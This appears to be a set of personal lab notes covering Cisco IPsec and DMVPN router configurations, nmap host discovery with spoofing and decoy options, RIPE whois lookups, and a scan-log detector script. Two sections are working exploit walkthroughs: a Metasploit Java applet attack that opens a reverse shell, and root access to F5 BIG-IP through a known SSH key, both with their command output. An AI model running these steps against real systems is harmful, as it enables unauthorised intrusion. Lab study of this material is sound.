# Dynamic and static VTI


Topology

[PC-1]----[ROUTER-1]----[ROUTER-2]----[PC-2]

[PC-1] eth0: 192.168.1.1/24

[ROUTER-1] fa0/1: 192.168.1.254/24
[ROUTER-1] fa0/0: 12.12.12.1/24
[ROUTER-1] vt1: 192.168.0.1/24 (virtual-template1)
[ROUTER-1] lo0: 192.168.0.1/24

[ROUTER-2] lo0: 192.168.0.2/24
[ROUTER-2] tu0: 192.168.0.2/24
[ROUTER-2] fa0/0: 12.12.12.2/24
[ROUTER-2] fa0/1: 192.168.2.254/24

[PC-2] eth0: 192.168.2.1/24

Dynamic VTI (Hub)

The hub cannot initiate a site-to-site VPN because it does not know the peer IP address.

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto keyring KEYRING
ROUTER-1(conf-keyring)# pre-shared-key address 0.0.0.0 0.0.0.0 key 0 SECRET_KEY
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto isakmp profile PROFILE
ROUTER-1(conf-isa-prof)# match identity address 0.0.0.0 0.0.0.0
ROUTER-1(conf-isa-prof)# keyring KEYRING
ROUTER-1(conf-isa-prof)# virtual-template 1
ROUTER-1(config)# crypto ipsec profile PROFILE
ROUTER-1(ipsec-profile)# set transform-set TRANSFORM_SET
ROUTER-1(ipsec-profile)# set isakmp-profile PROFILE
ROUTER-1(ipsec-profile)# set pfs group2
ROUTER-1(config)# interface lo0
ROUTER-1(config-if)# ip address 192.168.0.1 255.255.255.0
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# interface virtual-template1 type tunnel
ROUTER-1(config-if)# ip unnumbered lo0
ROUTER-1(config-if)# tunnel source fa0/0
ROUTER-1(config-if)# tunnel mode ipsec ipv4
ROUTER-1(config-if)# tunnel protection ipsec profile PROFILE
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NAT
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NAT interface fa0/0 overload
ROUTER-1(config)# router ospf 1
ROUTER-1(config-router)# network 192.168.0.0 0.0.255.255 area 0
ROUTER-1(config-router)# passive-interface default
ROUTER-1(config-router)# no passive-interface virtual-template1

Static VTI (Spoke)

The spokes initiate the site-to-site VPN.

ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto ipsec profile PROFILE
ROUTER-2(ipsec-profile)# set transform-set TRANSFORM_SET
ROUTER-2(ipsec-profile)# set pfs group2
ROUTER-2(config)# interface lo0
ROUTER-2(config-if)# ip address 192.168.0.2 255.255.255.0
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# interface tu0
ROUTER-2(config-if)# ip unnumbered lo0
ROUTER-2(config-if)# tunnel source fa0/0
ROUTER-2(config-if)# tunnel destination 12.12.12.1
ROUTER-2(config-if)# tunnel mode ipsec ipv4
ROUTER-2(config-if)# tunnel protection ipsec profile PROFILE
ROUTER-2(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NAT
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NAT interface fa0/0 overload
ROUTER-2(config)# router ospf 1
ROUTER-2(config-router)# network 192.168.0.0 0.0.255.255 area 0
ROUTER-2(config-router)# passive-interface default
ROUTER-2(config-router)# no passive-interface tu0

# GRE over IPsec


Topology

[PC-1]----[ROUTER-1]----[ROUTER-2]----[PC-2]

[PC-1] eth0: 192.168.1.1/24

[ROUTER-1] fa0/1: 192.168.1.254/24
[ROUTER-1] fa0/0: 12.12.12.1/24
[ROUTER-1] tu0: 12.0.0.1/24

[ROUTER-2] tu0: 12.0.0.2/24
[ROUTER-2] fa0/0: 12.12.12.2/24
[ROUTER-2] fa0/1: 192.168.2.254/24

[PC-2] eth0: 192.168.2.1/24

Using static crypto maps

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.2
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# ip access-list extended CRYPTO_ACL
ROUTER-1(config-ext-nacl)# permit gre host 12.12.12.1 host 12.12.12.2
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
ROUTER-1(config-crypto-map)# set peer 12.12.12.2
ROUTER-1(config-crypto-map)# match address CRYPTO_ACL
ROUTER-1(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-1(config-crypto-map)# set pfs group2
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# crypto map CRYPTO_MAP
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# interface tu0
ROUTER-1(config-if)# ip address 12.0.0.1 255.255.255.0
ROUTER-1(config-if)# tunnel source fa0/0
ROUTER-1(config-if)# tunnel destination 12.12.12.2
ROUTER-1(config)# ip route 192.168.2.0 255.255.255.0 12.0.0.2
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NAT
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NAT interface fa0/0 overload
ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# ip access-list extended CRYPTO_ACL
ROUTER-2(config-ext-nacl)# permit gre host 12.12.12.2 host 12.12.12.1
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
ROUTER-2(config-crypto-map)# set peer 12.12.12.1
ROUTER-2(config-crypto-map)# match address CRYPTO_ACL
ROUTER-2(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-2(config-crypto-map)# set pfs group2
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# crypto map CRYPTO_MAP
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# interface tu0
ROUTER-2(config-if)# ip address 12.0.0.2 255.255.255.0
ROUTER-2(config-if)# tunnel source fa0/0
ROUTER-2(config-if)# tunnel destination 12.12.12.1
ROUTER-2(config)# ip route 192.168.1.0 255.255.255.0 12.0.0.1
ROUTER-2(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NAT
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NAT interface fa0/0 overload

Using profiles

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.2
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto ipsec profile PROFILE
ROUTER-1(ipsec-profile)# set transform-set TRANSFORM_SET
ROUTER-1(ipsec-profile)# set pfs group2
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# interface tu0
ROUTER-1(config-if)# ip address 12.0.0.1 255.255.255.0
ROUTER-1(config-if)# tunnel source fa0/0
ROUTER-1(config-if)# tunnel destination 12.12.12.2
ROUTER-1(config-if)# tunnel protection ipsec profile PROFILE
ROUTER-1(config)# ip route 192.168.2.0 255.255.255.0 12.0.0.2
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NAT
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NAT interface fa0/0 overload
ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto ipsec profile PROFILE
ROUTER-2(ipsec-profile)# set transform-set TRANSFORM_SET
ROUTER-2(ipsec-profile)# set pfs group2
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# interface tu0
ROUTER-2(config-if)# ip address 12.0.0.2 255.255.255.0
ROUTER-2(config-if)# tunnel source fa0/0
ROUTER-2(config-if)# tunnel destination 12.12.12.1
ROUTER-2(config-if)# tunnel protection ipsec profile PROFILE
ROUTER-2(config)# ip route 192.168.1.0 255.255.255.0 12.0.0.1
ROUTER-2(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NAT
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NAT interface fa0/0 overload

# Dynamic and static crypto maps

Topology

[PC-1]----[ROUTER-1]----[ROUTER-2]----[PC-2]

[PC-1] eth0: 192.168.1.1/24

[ROUTER-1] fa0/1: 192.168.1.254/24
[ROUTER-1] fa0/0: 12.12.12.1/24

[ROUTER-2] fa0/0: 12.12.12.2/24
[ROUTER-2] fa0/1: 192.168.2.254/24

[PC-2] eth0: 192.168.2.1/24

Dynamic crypto map (Hub)

The hub cannot initiate a site-to-site VPN because it does not know the peer IP address.

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key 0 SECRET_KEY address 0.0.0.0 0.0.0.0
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto dynamic-map DYNAMIC-MAP 1
ROUTER-1(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-1(config-crypto-map)# set pfs group2
ROUTER-1(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp dynamic DYNAMIC-MAP
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# crypto map CRYPTO_MAP
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NONAT
ROUTER-1(config-ext-nacl)# deny ip 192.168.1.0 0.0.0.255 192.168.0.0 0.0.255.255
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NONAT interface fa0/0 overload

Static crypto map (Spoke)

The spokes initiate the site-to-site VPN.

ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# ip access-list extended CRYPTO_ACL
ROUTER-2(config-ext-nacl)# permit ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
ROUTER-2(config-crypto-map)# set peer 12.12.12.1
ROUTER-2(config-crypto-map)# match address CRYPTO_ACL
ROUTER-2(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-2(config-crypto-map)# set pfs group2
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# crypto map CRYPTO_MAP
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# ip route 192.168.1.0 255.255.255.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NONAT
ROUTER-2(config-ext-nacl)# deny ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NONAT interface fa0/0 overload

# Nmap Host Discovery

Source file

# cat ip_list.txt
1.1.1.0
1.1.1.1
1.1.1.2
1.1.1.3
1.1.1.4
1.1.1.5
1.1.1.6
1.1.1.7
1.1.1.8
1.1.1.9
# nmap -n -sL -iL ip_list.txt

Reverse DNS resolution

# cat /etc/resolv.conf
nameserver 8.8.8.8
# nmap --dns-servers 8.8.4.4 -sL 1.1.1.0/24

Ping scan only, -sP (newer nmap releases call this -sn)

ICMP echo request -PE:

# nmap --dns-servers 8.8.4.4 -sP -PE 1.1.1.1

ICMP timestamp request -PP:

# nmap --dns-servers 8.8.4.4 -sP -PP 1.1.1.1

ICMP address mask request -PM:

# nmap --dns-servers 8.8.4.4 -sP -PM 1.1.1.1

TCP SYN ping -PS:

# nmap --dns-servers 8.8.4.4 -sP -PS80 1.1.1.1

TCP ACK ping -PA:

# nmap --dns-servers 8.8.4.4 -sP -PA80 1.1.1.1

UDP ping -PU:

# nmap --dns-servers 8.8.4.4 -sP -PU53 1.1.1.1

IP protocol ping -PO:

# nmap --dns-servers 8.8.4.4 -sP -POicmp,igmp 1.1.1.1

ARP ping -PR (hosts on the local Ethernet segment):

# nmap --dns-servers 192.168.1.10 -sP -PR 192.168.1.1

Related options:

--verbose
--source-port _port_
-n disables DNS resolution
--data-length _length_ adds random bytes to every packet
--ttl _value_
-T3, -T4, -T5 speed up ping scanning
--max-parallelism _value_
--max-rtt-timeout _value_ how long nmap waits for a ping response
-oA, -oN, -oG, -oX different outputs
--packet-trace provides more detail
-D _decoy1_ adds some noise

Spoof your real source address -e _intf_ -S _spoofed-ip_:

# nmap --dns-servers 8.8.4.4 -sP -PS80 -e ppp0 -S 2.2.2.2 1.1.1.1

Skip the discovery stage with -PN (spelled -Pn in newer nmap releases) and begin the default scanning stage

The host is treated as up regardless of whether it answers any discovery probe:

# nmap -PN 1.1.1.1
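The defender's view of the probe types listed above: the ICMP timestamp (-PP) and address mask (-PM) requests and lone ACKs (-PA) almost never occur in ordinary client traffic, so they stand out in firewall logs. This is an added example, not part of the original page or of nmap; the log lines are constructed in the netfilter LOG format and the thresholds are the example's own choices.

```python
"""Spot nmap-style host-discovery probes in netfilter (iptables LOG) lines.

Added example, not from the original page or from nmap. The log lines are
constructed in the kernel's netfilter LOG format; the thresholds are this
example's own choices.
"""
import re
from collections import defaultdict
from typing import Dict, List

FIELD = re.compile(r"(\w+)=(\S*)")
TCP_FLAGS = {"SYN", "ACK", "FIN", "RST", "PSH", "URG"}  # logged as bare words
# ICMP types behind -PE, -PP and -PM respectively.
ICMP_KIND = {"8": "icmp-echo", "13": "icmp-timestamp", "17": "icmp-addrmask"}
# Probe kinds that ordinary client traffic almost never produces.
RARE = {"icmp-timestamp", "icmp-addrmask", "tcp-ack-noconn"}


def parse_line(line: str) -> dict:
    """Key=value fields of one LOG line plus the set of bare TCP flag words."""
    rec = dict(FIELD.findall(line))
    rec["FLAGS"] = {w for w in line.split() if w in TCP_FLAGS}
    return rec


def probe_kind(rec: dict) -> str:
    """Classify one logged packet by the discovery probe it resembles.

    Assumes the LOG rule sits after the ESTABLISHED/RELATED accept, so a
    logged lone ACK belongs to no connection (the -PA pattern).
    """
    proto = rec.get("PROTO")
    if proto == "ICMP":
        return ICMP_KIND.get(rec.get("TYPE"), "icmp-other")
    if proto == "TCP":
        if rec["FLAGS"] == {"SYN"}:
            return "tcp-syn"
        if rec["FLAGS"] == {"ACK"}:
            return "tcp-ack-noconn"
        return "tcp-other"
    if proto == "UDP":
        return "udp"
    return f"proto-{proto}"                  # -PO style raw protocol probes


def summarize(lines: List[str], min_targets: int = 3) -> Dict[str, dict]:
    """Per source address: probe kinds, distinct targets and why it was flagged."""
    by_src: Dict[str, dict] = defaultdict(lambda: {"kinds": set(), "targets": set()})
    for line in lines:
        rec = parse_line(line)
        if "SRC" not in rec or "DST" not in rec:
            continue                         # not a packet line
        by_src[rec["SRC"]]["kinds"].add(probe_kind(rec))
        by_src[rec["SRC"]]["targets"].add(rec["DST"])
    for entry in by_src.values():
        reasons = []
        rare = entry["kinds"] & RARE
        if rare:
            reasons.append("rare probe types: " + ", ".join(sorted(rare)))
        if len(entry["targets"]) >= min_targets:
            reasons.append(f"{len(entry['targets'])} distinct targets")
        if len(entry["kinds"]) >= 3:
            reasons.append("several probe types from one source")
        entry["reasons"] = reasons
    return dict(by_src)


def flagged(lines: List[str]) -> List[str]:
    """Sources with at least one reason, most reasons first."""
    summary = summarize(lines)
    return sorted((s for s, e in summary.items() if e["reasons"]),
                  key=lambda s: -len(summary[s]["reasons"]))


# Constructed log lines: one scanner cycling through -PP, -PM, -PS80 and
# -PA80 against three hosts, and one ordinary client pinging and connecting.
SAMPLE_LOG = [
    "kernel: IN=eth0 OUT= SRC=203.0.113.9 DST=192.0.2.10 LEN=40 TTL=44 ID=1 PROTO=ICMP TYPE=13 CODE=0 ID=0 SEQ=0",
    "kernel: IN=eth0 OUT= SRC=203.0.113.9 DST=192.0.2.10 LEN=32 TTL=44 ID=2 PROTO=ICMP TYPE=17 CODE=0 ID=0 SEQ=0",
    "kernel: IN=eth0 OUT= SRC=203.0.113.9 DST=192.0.2.11 LEN=44 TTL=44 ID=3 PROTO=TCP SPT=43210 DPT=80 WINDOW=1024 RES=0x00 SYN URGP=0",
    "kernel: IN=eth0 OUT= SRC=203.0.113.9 DST=192.0.2.12 LEN=40 TTL=44 ID=4 PROTO=TCP SPT=43211 DPT=80 WINDOW=1024 RES=0x00 ACK URGP=0",
    "kernel: IN=eth0 OUT= SRC=198.51.100.4 DST=192.0.2.10 LEN=84 TTL=61 ID=5 PROTO=ICMP TYPE=8 CODE=0 ID=7 SEQ=1",
    "kernel: IN=eth0 OUT= SRC=198.51.100.4 DST=192.0.2.10 LEN=60 TTL=61 ID=6 PROTO=TCP SPT=51000 DPT=443 WINDOW=64240 RES=0x00 SYN URGP=0",
]

if __name__ == "__main__":
    for src, entry in summarize(SAMPLE_LOG).items():
        print(src, sorted(entry["kinds"]), entry["reasons"])
```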

# RIPE whois queries

Introduction

https://www.ripe.net/data-tools/support/documentation/queries-ref-card


Direct queries

# whois -B -h whois.ripe.net 217.148.69.0
# whois -B -h whois.ripe.net 217.148.69.0/24
# whois -B -h whois.ripe.net CAIXA
# whois -B -h whois.ripe.net EdJ9-RIPE
# whois -B -h whois.ripe.net edejuan@lacaixa.es
# whois -B -h whois.ripe.net LACAIXA-MNT
# whois -B -h whois.ripe.net AS16383

Inverse queries

# whois -B -h whois.ripe.net -i person EdJ9-RIPE
# whois -B -h whois.ripe.net -i notify edejuan@lacaixa.es
# whois -B -h whois.ripe.net -i mnt-by LACAIXA-MNT
# whois -B -h whois.ripe.net -i origin AS16383
# whois -B -h whois.ripe.net -i nserver ns1.lacaixa.com

Commonly used flags

# whois -B -h whois.ripe.net -r 217.148.69.0 ! Disables recursive search
# whois -B -h whois.ripe.net -L 217.148.69.0 ! All less specific objects

# Exploiting Java 0day

Introduction

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-4681

Metasploit

# msfconsole

msf > use exploit/multi/browser/java_jre17_exec
msf  exploit(java_jre17_exec) > set payload java/shell/reverse_tcp
msf  exploit(java_jre17_exec) > set srvhost 192.168.0.2
msf  exploit(java_jre17_exec) > set lhost 192.168.0.2
msf  exploit(java_jre17_exec) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.2:4444 
msf  exploit(java_jre17_exec) > [*] Using URL: http://192.168.0.2:8080/UxFhxobmVYzm
[*] Server started.
[*] 192.168.0.1      java_jre17_exec - Java 7 Applet Remote Code Execution handling request
[*] 192.168.0.1      java_jre17_exec - Sending Applet.jar
[*] 192.168.0.1      java_jre17_exec - Sending Applet.jar
[*] 192.168.0.1      java_jre17_exec - Sending Applet.jar
[*] Sending stage (2976 bytes) to 192.168.0.1
[*] Command shell session 1 opened (192.168.0.2:4444 -> 192.168.0.1:1139)

msf  exploit(java_jre17_exec) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\User\Desktop>

# Exploiting F5 BIG-IP SSH vulnerability

Introduction

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1493
http://support.f5.com/kb/en-us/solutions/public/13000/600/sol13600.html

Option 1: Command-line

# cat f5_private_key 
# chmod 0600 f5_private_key
# ssh -i f5_private_key root@192.168.1.1
[root@F5-BIG-IP:Active] config # bigpipe platform | grep Platform
|     BIOS revision: F5 Platform: C103 OBJ-0335-01 BIOS (build: 130) Date: 09/12/09
[root@F5-BIG-IP:Active] config # bigpipe version | grep Version
BIG-IP Version 10.2.2 969.0
[root@F5-BIG-IP:Active] config # whoami
root

Option 2: PuTTY

- Use PuTTYGen to obtain a private ppk file from f5_private_key
- Execute PuTTY
- Connection/SSH/Auth/Private key file for authentication/Browse...: C:\f5_private_key.ppk
- Session/Host Name (or IP address) and Port: 192.168.1.1:22
- Open

login as: root
Authenticating with public key "imported-openssh-key"
[root@F5-BIG-IP:Active] config # whoami
root

Option 3: Metasploit

# msfconsole

msf > use exploit/linux/ssh/f5_bigip_known_privkey
msf  exploit(f5_bigip_known_privkey) > show payloads
msf  exploit(f5_bigip_known_privkey) > set payload cmd/unix/interact
msf  exploit(f5_bigip_known_privkey) > set lhost 192.168.1.2
msf  exploit(f5_bigip_known_privkey) > set rhost 192.168.1.1
msf  exploit(f5_bigip_known_privkey) > exploit

[+] Successful login
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.2:42298 -> 192.168.1.1:22)

whoami
root

# Dynamic Multipoint VPN (DMVPN)

Topology

[ROUTER-0]-----[ROUTER-1]
[ROUTER-0]-----[ROUTER-2]
[ROUTER-0]-----[ROUTER-3]

[ROUTER-1] is the NHRP server.
[ROUTER-2] and [ROUTER-3] are the NHRP clients.

[ROUTER-0] fa0/1: 192.168.1.254/24
[ROUTER-0] fa0/2: 192.168.2.254/24
[ROUTER-0] fa0/3: 192.168.3.254/24

[ROUTER-1] fa0/0: 192.168.1.1/24
[ROUTER-2] fa0/0: 192.168.2.2/24
[ROUTER-3] fa0/0: 192.168.3.3/24

ROUTER-1 configuration

Network

ROUTER-1(config)# interface FastEthernet0/0
ROUTER-1(config-if)# ip address 192.168.1.1 255.255.255.0
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 192.168.1.254

Multipoint GRE (mGRE) and Next Hop Resolution Protocol (NHRP)

ROUTER-1(config)# interface Tunnel1
ROUTER-1(config-if)# ip address 1.2.3.1 255.255.255.0
ROUTER-1(config-if)# ip nhrp authentication NHRP_KEY
ROUTER-1(config-if)# ip nhrp map multicast dynamic
ROUTER-1(config-if)# ip nhrp network-id 123
ROUTER-1(config-if)# tunnel source FastEthernet0/0
ROUTER-1(config-if)# tunnel mode gre multipoint
ROUTER-1(config-if)# tunnel key 123

IPsec

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key SECRET_KEY address 192.168.2.2
ROUTER-1(config)# crypto isakmp key SECRET_KEY address 192.168.3.3
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto ipsec profile PROFILE
ROUTER-1(ipsec-profile)# set transform-set TRANSFORM_SET
ROUTER-1(ipsec-profile)# set pfs group2
ROUTER-1(config)# interface Tunnel1
ROUTER-1(config-if)# tunnel protection ipsec profile PROFILE

ROUTER-2 configuration

Network

ROUTER-2(config)# interface FastEthernet0/0
ROUTER-2(config-if)# ip address 192.168.2.2 255.255.255.0
ROUTER-2(config)# ip route 0.0.0.0 0.0.0.0 192.168.2.254

Multipoint GRE (mGRE) and Next Hop Resolution Protocol (NHRP)

ROUTER-2(config)# interface Tunnel2
ROUTER-2(config-if)# ip address 1.2.3.2 255.255.255.0
ROUTER-2(config-if)# ip nhrp authentication NHRP_KEY
ROUTER-2(config-if)# ip nhrp map 1.2.3.1 192.168.1.1
ROUTER-2(config-if)# ip nhrp network-id 123
ROUTER-2(config-if)# ip nhrp nhs 1.2.3.1
ROUTER-2(config-if)# tunnel source FastEthernet0/0
ROUTER-2(config-if)# tunnel mode gre multipoint
ROUTER-2(config-if)# tunnel key 123

IPsec

ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key SECRET_KEY address 192.168.1.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto ipsec profile PROFILE
ROUTER-2(ipsec-profile)# set transform-set TRANSFORM_SET
ROUTER-2(ipsec-profile)# set pfs group2
ROUTER-2(config)# interface Tunnel2
ROUTER-2(config-if)# tunnel protection ipsec profile PROFILE

ROUTER-3 configuration

Network

ROUTER-3(config)# interface FastEthernet0/0
ROUTER-3(config-if)# ip address 192.168.3.3 255.255.255.0
ROUTER-3(config)# ip route 0.0.0.0 0.0.0.0 192.168.3.254

Multipoint GRE (mGRE) and Next Hop Resolution Protocol (NHRP)

ROUTER-3(config)# interface Tunnel3
ROUTER-3(config-if)# ip address 1.2.3.3 255.255.255.0
ROUTER-3(config-if)# ip nhrp authentication NHRP_KEY
ROUTER-3(config-if)# ip nhrp map 1.2.3.1 192.168.1.1
ROUTER-3(config-if)# ip nhrp network-id 123
ROUTER-3(config-if)# ip nhrp nhs 1.2.3.1
ROUTER-3(config-if)# tunnel source FastEthernet0/0
ROUTER-3(config-if)# tunnel mode gre multipoint
ROUTER-3(config-if)# tunnel key 123

IPsec

ROUTER-3(config)# crypto isakmp policy 1
ROUTER-3(config-isakmp)# authentication pre-share
ROUTER-3(config-isakmp)# encryption aes
ROUTER-3(config-isakmp)# hash sha
ROUTER-3(config-isakmp)# group 2
ROUTER-3(config-isakmp)# lifetime 86400
ROUTER-3(config)# crypto isakmp aggressive-mode disable
ROUTER-3(config)# crypto isakmp key SECRET_KEY address 192.168.1.1
ROUTER-3(config)# crypto isakmp enable
ROUTER-3(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-3(config)# crypto ipsec profile PROFILE
ROUTER-3(ipsec-profile)# set transform-set TRANSFORM_SET
ROUTER-3(ipsec-profile)# set pfs group2
ROUTER-3(config)# interface Tunnel3
